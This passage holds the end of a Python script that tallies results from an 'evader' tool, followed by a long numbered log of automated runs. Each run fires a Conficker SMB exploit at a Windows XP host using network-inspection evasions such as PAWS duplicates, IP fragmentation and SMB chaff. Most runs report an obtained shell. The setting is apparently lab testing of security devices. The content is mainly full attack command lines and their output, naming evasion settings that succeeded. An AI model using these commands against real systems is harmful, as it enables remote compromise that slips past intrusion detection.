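def summarise(records: List[dict]) -> Dict[str, Counter]:
    """Count outcomes per evasion module (a run with N modules counts N times)."""
    table: Dict[str, Counter] = defaultdict(Counter)
    for r in records:
        for ev in r["evasions"]:
            table[ev["module"]][r["outcome"]] += 1
    return dict(table)


# Constructed sample modelled on the records above (shortened --uid, no paste numbering).
SAMPLE_LOG = """\
9024 runs averaging 1.92 runs / second ; progress: 4701/43200.....2015-06-08 00:37:52 INFO
Success. (10.62.90.117):
/root/evader/evader --uid=mongbat_x --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --autoclose --attack=conficker --src_port=65431 --evasion=[netbios_connect,msrpc_bind]ipv4_opt,"75%","inc","random_alpha" --evasion=[msrpc_req,end]smb_decoytrees,"4","6","8","random_msrpcreq" --payload=shell
Info: NetBIOS connection 10.62.90.117:65431 -> 10.35.1.207:445
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
.....Pid 7992 timed out - killed
2015-06-08 00:37:44 INFO
Timed out (10.62.90.112):
/root/evader/evader --uid=mongbat_x --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --autoclose --attack=conficker --src_port=26909 --evasion=[smb_connect,smb_opentree]tcp_chaff,"50%","chksum|outofwindow|shorthdr","zero" --evasion=[msrpc_req,end]tcp_paws,"1","6","zero" --payload=shell
Info: NetBIOS connection 10.62.90.112:26909 -> 10.35.1.207:445
Terminated
.....2015-06-08 00:38:54 INFO
Success. (10.62.90.110):
/root/evader/evader --uid=mongbat_x --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --autoclose --attack=conficker --src_port=17243 --evasion=[smb_connect,msrpc_bind]tcp_overlap,"6","new","random_alphanum" --evasion=[msrpc_req,end]tcp_paws,"1","9","random" --payload=shell
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE_LOG)
    for module, counts in sorted(summarise(recs).items()):
        print(f"{module:16s} {dict(counts)}")
```

Run it against the full paste with `parse_records(open("evader.log").read())`; because a random-mode run combines two or three evasions, a module's success count shows which combinations it appeared in rather than proving that it alone defeats inspection, so rank by module and then read the individual records for the ones that matter.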
  5319. .....2015-06-08 00:37:54 INFO
  5320. Success. (10.62.90.112):
  5321. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18113 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=5emIDQWoFM4 --evasion=[smb_connect,end]smb_chaff,"21","write_flag","alphanum" --evasion=[smb_openpipe,end]tcp_paws,"25%","234116151","random" --verifydelay=1000 --payload=shell
  5322. Info: Using random seed 5emIDQWoFM7
  5323. The following evasions are applied from stage smb_connect to end:
  5324. - Before every 21st SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random alphanumeric payload
  5325. The following evasions are applied from stage smb_openpipe to end:
  5326. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 234116151> and has random bytes as payload
  5327.  
  5328. Info: NetBIOS connection 10.62.90.112:18113 -> 10.35.1.207:445
  5329. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5330. Info: Sending MSRPC request with exploit
  5331. Info: Shell found, attack succeeded
  5332. Info: Shell closed
  5333. 0: Success.
  5334. ........
  5335. 9044 runs averaging 1.92 runs / second ; progress: 4706/43200.......................
  5336. 9067 runs averaging 1.92 runs / second ; progress: 4711/43200.................
  5337. 9084 runs averaging 1.93 runs / second ; progress: 4716/43200..
  5338. 9086 runs averaging 1.92 runs / second ; progress: 4721/43200
  5339. 9086 runs averaging 1.92 runs / second ; progress: 4726/43200...........
  5340. 9097 runs averaging 1.92 runs / second ; progress: 4731/43200...............
  5341. 9112 runs averaging 1.92 runs / second ; progress: 4736/43200......
  5342. 9118 runs averaging 1.92 runs / second ; progress: 4741/43200......
  5343. 9124 runs averaging 1.92 runs / second ; progress: 4746/43200........
  5344. 9132 runs averaging 1.92 runs / second ; progress: 4751/43200..........
  5345. 9142 runs averaging 1.92 runs / second ; progress: 4756/43200....
  5346. 9146 runs averaging 1.92 runs / second ; progress: 4761/43200.2015-06-08 00:38:54 INFO
  5347. Success. (10.62.90.110):
  5348. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17243 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=mBAIsd7uGQ8 --evasion=[smb_openpipe,end]smb_decoytrees,"7","1","3","random_msrpcreq" --evasion=[smb_connect,msrpc_bind]tcp_overlap,"6","new","random_alphanum" --verifydelay=1000 --payload=shell
  5349. Info: Using random seed mBAIsd7uGQ+
  5350. The following evasions are applied from stage smb_connect to msrpc_bind:
  5351. - TCP segments are set to overlap by 6 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
  5352. The following evasions are applied from stage smb_openpipe to end:
  5353. - Before normal SMB writes, 7 SMB trees are opened and 1 write is performed to them. The write payload is 3 bytes of MSRPC request-like data.
  5354.  
  5355. Info: NetBIOS connection 10.62.90.110:17243 -> 10.35.1.207:445
  5356. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5357. Info: Sending MSRPC request with exploit
  5358. Info: Shell found, attack succeeded
  5359. Info: Shell closed
  5360. 0: Success.
  5361. .
  5362. 9149 runs averaging 1.92 runs / second ; progress: 4766/43200.........
  5363. 9158 runs averaging 1.92 runs / second ; progress: 4771/43200..........
  5364. 9168 runs averaging 1.92 runs / second ; progress: 4776/43200...............
  5365. 9183 runs averaging 1.92 runs / second ; progress: 4782/43200...2015-06-08 00:39:16 INFO
  5366. Success. (10.62.90.117):
  5367. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30782 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=0FzzJYfIw6U --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"6","6","2048","random_alphanum" --evasion=[start,end]tcp_paws,"5","4","random" --verifydelay=1000 --payload=shell
  5368. Info: Using random seed 0FzzJYfIw6X
  5369. The following evasions are applied from stage start to end:
        - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has random bytes as payload
  5370. The following evasions are applied from stage smb_opentree to msrpc_req:
  5371. - Before normal SMB writes, 6 SMB trees are opened and 6 writes are performed to them. The write payload is 2048 random alphanumeric bytes.
  5372.  
  5373. Info: NetBIOS connection 10.62.90.117:30782 -> 10.35.1.207:445
  5374. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5375. Info: Sending MSRPC request with exploit
  5376. Info: Shell found, attack succeeded
  5377. Info: Shell closed
  5378. 0: Success.
  5379.  
  5380. 9187 runs averaging 1.92 runs / second ; progress: 4787/43200.....
  5381. 9192 runs averaging 1.92 runs / second ; progress: 4792/43200...
  5382. 9195 runs averaging 1.92 runs / second ; progress: 4797/43200.....
  5383. 9200 runs averaging 1.92 runs / second ; progress: 4802/43200.
  5384. 9201 runs averaging 1.91 runs / second ; progress: 4807/432002015-06-08 00:39:37 INFO
  5385. Success. (10.62.90.117):
  5386. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=41485 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=SM6cPJn5+OQ --evasion=[msrpc_bind,end]tcp_paws,"1","9","random" --evasion=[msrpc_bind,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  5387. Info: Using random seed SM6cPJn5+OR
  5388. The following evasions are applied from stage msrpc_bind to end:
  5389. - Every TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has random bytes as payload
  5390. - TCP timestamps echo reply value is sent in the wrong endianness
  5391.  
  5392. Info: NetBIOS connection 10.62.90.117:41485 -> 10.35.1.207:445
  5393. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5394. Info: Sending MSRPC request with exploit
  5395. Info: Shell found, attack succeeded
  5396. Info: Shell closed
  5397. 0: Success.
  5398. ...
  5399. 9205 runs averaging 1.91 runs / second ; progress: 4812/43200.........
  5400. 9214 runs averaging 1.91 runs / second ; progress: 4817/43200........2015-06-08 00:39:51 INFO
  5401. Success. (10.62.90.112):
  5402. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=43229 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=fd/3gZhjdgM --evasion=[smb_opentree,end]tcp_paws,"75%","240370247","shuffle" --evasion=[smb_opentree,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  5403. Info: Using random seed fd/3gZhjdgN
  5404. The following evasions are applied from stage smb_opentree to end:
  5405. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 240370247> and has shuffled original payload
  5406. - TCP timestamps echo reply value is sent in the wrong endianness
  5407.  
  5408. Info: NetBIOS connection 10.62.90.112:43229 -> 10.35.1.207:445
  5409. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5410. Info: Sending MSRPC request with exploit
  5411. Info: Shell found, attack succeeded
  5412. Info: CommandShell::SendCommand() - Failed to send string
  5413. Info: Command shell connection reset.
  5414. Info: Shell closed
  5415. 0: Success.
  5416. ....
  5417. 9227 runs averaging 1.91 runs / second ; progress: 4822/43200......
  5418. 9233 runs averaging 1.91 runs / second ; progress: 4827/43200.
  5419. 9234 runs averaging 1.91 runs / second ; progress: 4832/43200
  5420. 9234 runs averaging 1.91 runs / second ; progress: 4837/43200.....
  5421. 9239 runs averaging 1.91 runs / second ; progress: 4842/43200.......
  5422. 9246 runs averaging 1.91 runs / second ; progress: 4847/43200
  5423. 9246 runs averaging 1.91 runs / second ; progress: 4852/43200
  5424. 9246 runs averaging 1.90 runs / second ; progress: 4857/43200.2015-06-08 00:40:30 INFO
  5425. Success. (10.62.90.112):
  5426. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25007 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=4t8G7ohmFd8 --evasion=[smb_connect,msrpc_bind]smb_chaff,"13","write_flag","msrpc" --evasion=[smb_openpipe,end]smb_decoytrees,"4","4","2","random_msrpcreq" --verifydelay=1000 --payload=shell
  5427. Info: Using random seed 4t8G7ohmFd/
  5428. The following evasions are applied from stage smb_connect to msrpc_bind:
  5429. - Before every 13th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
  5430. The following evasions are applied from stage smb_openpipe to end:
  5431. - Before normal SMB writes, 4 SMB trees are opened and 4 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
  5432.  
  5433. Info: NetBIOS connection 10.62.90.112:25007 -> 10.35.1.207:445
  5434. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5435. Info: Sending MSRPC request with exploit
  5436. Info: Shell found, attack succeeded
  5437. Info: Shell closed
  5438. 0: Success.
  5439. ...
  5440. 9251 runs averaging 1.90 runs / second ; progress: 4862/43200...........
  5441. 9262 runs averaging 1.90 runs / second ; progress: 4867/43200.....
  5442. 9267 runs averaging 1.90 runs / second ; progress: 4872/43200.Pid 10886 timed out - killed
  5443. 2015-06-08 00:40:43 INFO
  5444. Timed out (10.62.90.111):
  5445. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=14403 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=ozOEXUfZ3/w --evasion=[smb_openpipe,end]smb_chaff,"3","write_flag","msrpc" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
  5446. Info: Using random seed ozOEXUfZ3/y
  5447. The following evasions are applied from stage smb_opentree to msrpc_req:
  5448. - Add a random alphabetic urgent data byte to every 2nd TCP segment.
  5449. The following evasions are applied from stage smb_openpipe to end:
  5450. - Before every 3rd SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
  5451.  
  5452. Info: NetBIOS connection 10.62.90.111:14403 -> 10.35.1.207:445
  5453. Terminated
  5454. ....
  5455. 9273 runs averaging 1.90 runs / second ; progress: 4877/43200......
  5456. 9279 runs averaging 1.90 runs / second ; progress: 4882/432002015-06-08 00:40:52 INFO
  5457. Success. (10.62.90.112):
  5458. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38297 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=rrkcEtoysN8 --evasion=[smb_connect,smb_openpipe]ipv4_frag,"56" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"75%","268435454","random_alphanum" --verifydelay=1000 --payload=shell
  5459. Info: Using random seed rrkcEtoysN+
  5460. The following evasions are applied from stage smb_connect to smb_openpipe:
  5461. - IPv4 fragments with at most 56 bytes per fragment
  5462. The following evasions are applied from stage msrpc_bind to msrpc_req:
  5463. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alphanumeric bytes as payload
  5464.  
  5465. Info: NetBIOS connection 10.62.90.112:38297 -> 10.35.1.207:445
  5466. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5467. Info: Sending MSRPC request with exploit
  5468. Info: Shell found, attack succeeded
  5469. Info: Shell closed
  5470. 0: Success.
  5471. .Pid 11141 timed out - killed
  5472. 2015-06-08 00:40:53 INFO
  5473. Timed out (10.62.90.119):
  5474. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=64976 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=nm6gz4exUZ4 --evasion=[start,netbios_connect]tcp_paws,"75%","268435455","alpharandomized" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"1","random" --verifydelay=1000 --payload=shell
  5475. Info: Using random seed nm6gz4exUZ6
  5476. The following evasions are applied from stage start to netbios_connect:
  5477. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has original payload with alphabetic bytes randomized
  5478. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  5479. - Add a random urgent data byte to every TCP segment.
  5480.  
  5481. Info: NetBIOS connection 10.62.90.119:64976 -> 10.35.1.207:445
  5482. Terminated
  5483. .......
  5484. 9289 runs averaging 1.90 runs / second ; progress: 4887/43200.........
  5485. 9298 runs averaging 1.90 runs / second ; progress: 4892/43200...
  5486. 9301 runs averaging 1.90 runs / second ; progress: 4897/43200.....
  5487. 9306 runs averaging 1.90 runs / second ; progress: 4902/43200.....
  5488. 9311 runs averaging 1.90 runs / second ; progress: 4907/43200.........
  5489. 9320 runs averaging 1.90 runs / second ; progress: 4912/43200.2015-06-08 00:41:23 INFO
  5490. Success. (10.62.90.112):
  5491. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39207 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=3I+N5IlyQj0 --evasion=[smb_opentree,end]smb_writeandxpad,"1024","random_alphanum" --evasion=[msrpc_req,end]tcp_paws,"1","268435454","shuffle30" --verifydelay=1000 --payload=shell
  5492. Info: Using random seed 3I+N5IlyQj3
  5493. The following evasions are applied from stage smb_opentree to end:
  5494. - 1024 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
  5495. The following evasions are applied from stage msrpc_req to end:
  5496. - Every TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has 30 bytes of original payload, then shuffled original payload
  5497.  
  5498. Info: NetBIOS connection 10.62.90.112:39207 -> 10.35.1.207:445
  5499. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5500. Info: Sending MSRPC request with exploit
  5501. Info: Shell found, attack succeeded
  5502. Info: Shell closed
  5503. 0: Success.
  5504. Pid 11571 timed out - killed
  5505. 2015-06-08 00:41:23 INFO
  5506. Timed out (10.62.90.118):
  5507. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=32339 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=jX8rcN/h25o --evasion=[smb_openpipe,msrpc_bind]ipv4_frag,"16" --evasion=[smb_opentree,end]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
  5508. Info: Using random seed jX8rcN/h25q
  5509. The following evasions are applied from stage smb_opentree to end:
  5510. - Add a zero urgent data byte to every 2nd TCP segment.
  5511. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  5512. - IPv4 fragments with at most 16 bytes per fragment
  5513.  
  5514. Info: NetBIOS connection 10.62.90.118:32339 -> 10.35.1.207:445
  5515. Terminated
  5516. ..........
  5517. 9333 runs averaging 1.90 runs / second ; progress: 4917/43200.........2015-06-08 00:41:30 INFO
  5518. Success. (10.62.90.119):
  5519. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34803 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=tmDsj+XmrZ8 --evasion=[netbios_connect,end]ipv4_frag,"632" --evasion=[msrpc_req,end]tcp_paws,"50%","10","shuffle30" --evasion=[msrpc_req,end]tcp_segvar,"24730","31998" --verifydelay=1000 --payload=shell
  5520. Info: Using random seed tmDsj+XmrZ+
  5521. The following evasions are applied from stage netbios_connect to end:
  5522. - IPv4 fragments with at most 632 bytes per fragment
  5523. The following evasions are applied from stage msrpc_req to end:
  5524. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has 30 bytes of original payload, then shuffled original payload
  5525. - TCP packets are segmented to contain between 24730 and 31998 bytes of payload.
  5526.  
  5527. Info: NetBIOS connection 10.62.90.119:34803 -> 10.35.1.207:445
  5528. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5529. Info: Sending MSRPC request with exploit
  5530. Info: Shell found, attack succeeded
  5531. Info: Command shell connection reset.
  5532. Info: CommandShell::SendCommand() - Failed to send string
  5533. Info: Shell closed
  5534. 0: Success.
  5535. ..
  5536. 9345 runs averaging 1.90 runs / second ; progress: 4922/43200..........
  5537. 9355 runs averaging 1.90 runs / second ; progress: 4927/43200..........
  5538. 9365 runs averaging 1.90 runs / second ; progress: 4932/43200...............
  5539. 9380 runs averaging 1.90 runs / second ; progress: 4937/43200.........
  5540. 9389 runs averaging 1.90 runs / second ; progress: 4942/43200...........
  5541. 9400 runs averaging 1.90 runs / second ; progress: 4947/43200...........
  5542. 9411 runs averaging 1.90 runs / second ; progress: 4952/43200.........2015-06-08 00:42:05 INFO
  5543. Success. (10.62.90.118):
  5544. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11897 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=1Pcgp2wrgcE --evasion=[msrpc_bind,msrpc_req]ipv4_frag,"456" --evasion=[smb_openpipe,msrpc_bind]smb_decoytrees,"6","6","2","random_alphanum" --evasion=[smb_connect,msrpc_req]tcp_paws,"5","216017382","shuffle" --verifydelay=1000 --payload=shell
  5545. Info: Using random seed 1Pcgp2wrgcH
  5546. The following evasions are applied from stage smb_connect to msrpc_req:
  5547. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 216017382> and has shuffled original payload
  5548. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  5549. - Before normal SMB writes, 6 SMB trees are opened and 6 writes are performed to them. The write payload is 2 random alphanumeric bytes.
  5550. The following evasions are applied from stage msrpc_bind to msrpc_req:
  5551. - IPv4 fragments with at most 456 bytes per fragment
  5552.  
  5553. Info: NetBIOS connection 10.62.90.118:11897 -> 10.35.1.207:445
  5554. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5555. Info: Sending MSRPC request with exploit
  5556. Info: Shell found, attack succeeded
  5557. Info: Command shell connection reset.
  5558. Info: CommandShell::SendCommand() - Failed to send string
  5559. Info: Shell closed
  5560. 0: Success.
  5561. ........
  5562. 9429 runs averaging 1.90 runs / second ; progress: 4957/43200.............
  5563. 9442 runs averaging 1.90 runs / second ; progress: 4962/43200......2015-06-08 00:42:15 INFO
  5564. Success. (10.62.90.112):
  5565. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25532 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=biR6QHYn0fA --evasion=[smb_connect,end]ipv4_frag,"56" --evasion=[msrpc_bind,end]tcp_paws,"75%","57019005","alpharandomized" --evasion=[msrpc_bind,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  5566. Info: Using random seed biR6QHYn0fB
  5567. The following evasions are applied from stage smb_connect to end:
  5568. - IPv4 fragments with at most 56 bytes per fragment
  5569. The following evasions are applied from stage msrpc_bind to end:
  5570. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 57019005> and has original payload with alphabetic bytes randomized
  5571. - TCP timestamps echo reply value is sent in the wrong endianness
  5572.  
  5573. Info: NetBIOS connection 10.62.90.112:25532 -> 10.35.1.207:445
  5574. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5575. Info: Sending MSRPC request with exploit
  5576. Info: Shell found, attack succeeded
  5577. Info: CommandShell::SendCommand() - Failed to send string
  5578. Info: Command shell connection reset.
  5579. Info: Shell closed
  5580. 0: Success.
  5581. 2015-06-08 00:42:17 INFO
  5582. Success. (10.62.90.112):
  5583. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=53786 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=6PvoPo84oSk --evasion=[start,smb_connect]tcp_chaff,"2","chksum|nullchksum|nullflag","unmodified" --evasion=[netbios_connect,end]tcp_paws,"75%","208945","alpharandomized" --evasion=[netbios_connect,smb_openpipe]tcp_segvar,"63557","65534" --verifydelay=1000 --payload=shell
  5584. Info: Using random seed 6PvoPo84oSn
  5585. The following evasions are applied from stage start to smb_connect:
  5586.  
  5587. The following evasions are applied from stage netbios_connect to end:
  5588. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 208945> and has original payload with alphabetic bytes randomized
  5589. The following evasions are applied from stage netbios_connect to smb_openpipe:
  5590. - TCP packets are segmented to contain between 63557 and 65534 bytes of payload.
  5591.  
  5592. Info: NetBIOS connection 10.62.90.112:53786 -> 10.35.1.207:445
  5593. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5594. Info: Sending MSRPC request with exploit
  5595. Info: Shell found, attack succeeded
  5596. Info: CommandShell::SendCommand() - Failed to send string
  5597. Info: Command shell connection reset.
  5598. Info: Shell closed
  5599. 0: Success.
  5600.  
  5601. 9450 runs averaging 1.90 runs / second ; progress: 4967/43200..
  5602. 9452 runs averaging 1.90 runs / second ; progress: 4972/43200
  5603. 9452 runs averaging 1.90 runs / second ; progress: 4977/43200Pid 12388 timed out - killed
  5604. 2015-06-08 00:42:29 INFO
  5605. Timed out (10.62.90.116):
  5606. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25941 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=HYzAAspzemw --evasion=[smb_opentree,smb_openpipe]tcp_paws,"13","268435455","zero" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
  5607. Info: Using random seed HYzAAspzemw
  5608. The following evasions are applied from stage smb_opentree to smb_openpipe:
  5609. - Every 13th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has 0x00 bytes as payload
  5610. The following evasions are applied from stage smb_opentree to msrpc_bind:
  5611. - Add a random alphanumeric urgent data byte to every 2nd TCP segment.
  5612.  
  5613. Info: NetBIOS connection 10.62.90.116:25941 -> 10.35.1.207:445
  5614. Terminated
  5615. ..2015-06-08 00:42:31 INFO
  5616. Success. (10.62.90.117):
  5617. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37295 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=f4Rayn2XGBc --evasion=[msrpc_bind,msrpc_req]msrpc_ndrflag,"char_ebcdic","float_vax","byte3_zero","byte4_zero" --evasion=[netbios_connect,smb_opentree]tcp_paws,"2","6","alpharandomized" --evasion=[msrpc_bind,end]tcp_paws,"3","4","random" --verifydelay=1000 --payload=shell
  5618. Info: Using random seed f4Rayn2XGBd
  5619. The following evasions are applied from stage netbios_connect to smb_opentree:
  5620. - Every 2nd TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphabetic bytes randomized
  5621. The following evasions are applied from stage msrpc_bind to end:
  5622. - Every 3rd TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has random bytes as payload
  5623. The following evasions are applied from stage msrpc_bind to msrpc_req:
  5624. - MSRPC NDR flag is modified:
  5625. * EBCDIC character encoding
  5626. * VAX floating point value encoding
  5627. * Reserved 3rd byte is set to zero
  5628. * Reserved 4th byte is set to zero
  5629.  
  5630.  
  5631. Info: NetBIOS connection 10.62.90.117:37295 -> 10.35.1.207:445
  5632. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5633. Info: Sending MSRPC request with exploit
  5634. Info: Shell found, attack succeeded
  5635. Info: Shell closed
  5636. 0: Success.
  5637. ...
  5638. 9459 runs averaging 1.90 runs / second ; progress: 4982/43200...............
  5639. 9474 runs averaging 1.90 runs / second ; progress: 4988/43200..Pid 12663 timed out - killed
  5640. 2015-06-08 00:42:38 INFO
  5641. Timed out (10.62.90.115):
  5642. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=19557 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=MlzU34gI/UA --evasion=[msrpc_bind,msrpc_req]ipv4_frag,"72" --evasion=[start,netbios_connect]ipv4_order,"firstlast" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
  5643. Info: Using random seed MlzU34gI/UA
  5644. The following evasions are applied from stage start to netbios_connect:
  5645. - IPv4 fragments are sent in correct order except that the first fragment comes last
  5646. The following evasions are applied from stage smb_openpipe to end:
  5647. - 75% probability to add a random alphabetic urgent data byte to a TCP segment.
  5648. The following evasions are applied from stage msrpc_bind to msrpc_req:
  5649. - IPv4 fragments with at most 72 bytes per fragment
  5650.  
  5651. Info: NetBIOS connection 10.62.90.115:19557 -> 10.35.1.207:445
  5652. Terminated
  5653. ....
  5654. 9481 runs averaging 1.90 runs / second ; progress: 4993/43200
  5655. 9481 runs averaging 1.90 runs / second ; progress: 4998/43200
  5656. 9481 runs averaging 1.90 runs / second ; progress: 5003/43200.........
  5657. 9490 runs averaging 1.90 runs / second ; progress: 5008/43200......
  5658. 9496 runs averaging 1.89 runs / second ; progress: 5013/43200Pid 13487 timed out - killed
  5659. 2015-06-08 00:43:03 INFO
  5660. Timed out (10.62.90.113):
  5661. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39306 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=Q0zugvYbYYA --evasion=[smb_opentree,smb_openpipe]tcp_tsoptreply,"le" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
  5662. Info: Using random seed Q0zugvYbYYB
  5663. The following evasions are applied from stage smb_opentree to smb_openpipe:
  5664. - TCP timestamps echo reply value is sent in the wrong endianness
  5665. The following evasions are applied from stage smb_opentree to msrpc_req:
